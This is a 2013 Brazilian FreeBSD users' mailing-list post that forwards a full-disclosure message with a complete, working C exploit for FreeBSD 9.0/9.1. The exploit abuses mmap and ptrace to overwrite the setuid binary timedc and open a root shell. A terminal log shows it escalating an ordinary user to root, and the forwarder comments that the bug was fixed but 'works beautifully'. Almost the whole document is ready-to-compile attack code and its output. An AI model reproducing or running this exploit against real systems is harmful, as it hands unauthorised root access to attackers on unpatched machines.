[FUG-BR] Fwd: Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
Marcelo Gondim
gondim em bsdinfo.com.br
Quinta Junho 20 09:29:43 BRT 2013
É pessoal,
Sei que a vulnerabilidade foi corrigida agora mas foram 20 anos para
detectar isso? :(
E funciona lindo mesmo o programa.
-------- Mensagem original --------
Assunto: Happy Birthday FreeBSD! Now you are 20 years old and your
security is the same as 20 years ago... :)
Data: Wed, 19 Jun 2013 23:32:59 +0200
De: Hunger <hunger em hunger.hu>
Para: full-disclosure em lists.grok.org.uk
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
root em farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul em hunger.hu>
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
============================ code =========================
/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hunger<fbsd9lul em hunger.hu>
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago...
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8 em 1470n
*
* Special thanks to proactivesec.com
*
*/
#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"
int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
printf("by Hunger<fbsd9lul em hunger.hu>\n");
if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, "open");
if (stat(av[0], &st) == -1)
err(2, "stat");
if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
err(3, "mmap");
if ((pid = fork()) == -1)
err(4, "fork");
if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, "ptraceme");
return 0;
}
if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, "ptattach");
if (wait(&status) == -1)
err(7, "wait");
piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;
if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
err(8, "ptio");
execl(TG, TG, NULL);
return 0;
}
Mais detalhes sobre a lista de discussão freebsd